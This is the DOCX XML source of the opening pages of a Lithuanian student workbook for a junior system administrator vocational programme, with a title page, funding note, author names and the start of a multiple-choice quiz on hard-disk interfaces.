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37E5" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73F242F3" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="63BD0D10" wp14:editId="66AB005E">
                <wp:extent cx="5897880" cy="932815"/>
                <wp:effectExtent l="0" t="0" r="0" b="6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6" name="Picture 48" descr="cid:image001.jpg@01D40F86.D718AD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77CD0781" id="Group 5" o:spid="_x0000_s1026" style="width:464.4pt;height:73.45pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="6939,10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">
                  <v:imagedata r:id="rId14" r:href="rId15"/>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">
                  <v:imagedata r:id="rId16" o:title=""/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FFF60A9" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="732BFAF3" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79472805" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39D74FD0" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="141DAC1E" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5160AE4C" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Jaunesniojo sistemos administratoriaus modulinė profesinio mokymo programa, IV lygis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="050B8AAE" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="26D3EC5C" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2B1F5346" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BCA73B4" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50C5A0F9" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Teorinių ir praktinių užduočių</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48BD4F8A" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>mokinio sąsiuvinis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A14E3B" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4442F2E4" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13A8F2FD" w14:textId="77777777" w:rsidR="00DD0FB2" w:rsidRPr="005A5C28" w:rsidRDefault="00DD0FB2" w:rsidP="00DD0FB2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3B94EAAD" w14:textId="77777777" w:rsidR="00DD0FB2" w:rsidRPr="005A5C28" w:rsidRDefault="00DD0FB2" w:rsidP="00DD0FB2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07210731" w14:textId="6177AD29" w:rsidR="00B83AED" w:rsidRPr="005A5C28" w:rsidRDefault="00B83AED">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC7D8D0" w14:textId="2B3BEB09" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34B46F45" w14:textId="77777777" w:rsidR="007D644B" w:rsidRPr="005A5C28" w:rsidRDefault="007D644B" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63D5947A" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Teorinių ir praktinių užduočių mokinio sąsiuvinis parengtas įgyvendinant iš Europos Sąjungos struktūrinių fondų lėšų bendrai finansuojamą projektą „Lietuvos kvalifikacijų sistemos plėtra (I etapas)“ (projekto Nr. 09.4.1-ESFA-V-734-01-0001).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13AE0243" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15997412" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Teorinių ir praktinių užduočių mokinio sąsiuvinio</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(Jaunesniojo sistemos administratoriaus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14:paraId="3B06A511" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08F73E71" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1023308C" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="310A26E1" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:pStyle w:val="NoSpacing"/>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
        <w:t>Teorinių ir praktinių užduočių mokinio sąsiuvinio autoriai:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D824C2B" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="568"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Vitalij Zaleskij</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB103EF" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="568"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Leonid Tokranov</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F0BA79" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="568"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Andrius Zykas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352E74D9" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="568"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Marius Ališauskas</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524567D9" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C878E11" w14:textId="4BADC074" w:rsidR="004B69A5" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="006719D2">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:bCs/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="de-DE"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="778326D2" w14:textId="175464A2" w:rsidR="00EA3A96" w:rsidRPr="005A5C28" w:rsidRDefault="778FD0BE" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc495928181"/>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Modulis „</w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Įvadas į profesiją“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B270B" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0ECF2308" w14:textId="031FD3C0" w:rsidR="006F677E" w:rsidRPr="005A5C28" w:rsidRDefault="006F677E" w:rsidP="0089230F">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="276" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="lt-LT"/>
        </w:rPr>
        <w:t>TESTAS ĮSIVERTINTI GEBĖJIMAMS PRIEŠ PRADEDANT MOKYTIS</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="0"/>
    <w:p w14:paraId="5192ADBC" w14:textId="77777777" w:rsidR="006719D2" w:rsidRPr="005A5C28" w:rsidRDefault="006719D2" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CAE46BB" w14:textId="493A0305" w:rsidR="008F4F2D" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>K</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>urioje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>eilutėje</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>yra</w:t>
      </w:r>
      <w:r w:rsidR="006F677E" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t xml:space="preserve">išvardintos </w:t>
      </w:r>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>kietojo disko jungtys</w:t>
      </w:r>
      <w:r w:rsidR="008F4F2D" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>? Pažymėkite teisingą atsakymą.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F016D44" w14:textId="2848A25E" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>a) ATA, SCSI, USB</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C97D42" w14:textId="0589C4BF" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:contextualSpacing/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>b) ATA, USB, SICS</w:t>
      </w:r>
      <w:r w:rsidR="00F44D72" w:rsidRPr="005A5C28">
        <w:rPr>
          <w:lang w:eastAsia="lt-LT"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D6FF42" w14:textId="114D89A3" w:rsidR="00326039" w:rsidRPr="005A5C28" w:rsidRDefault="00326039" w:rsidP="0089230F">
      <w:pPr>
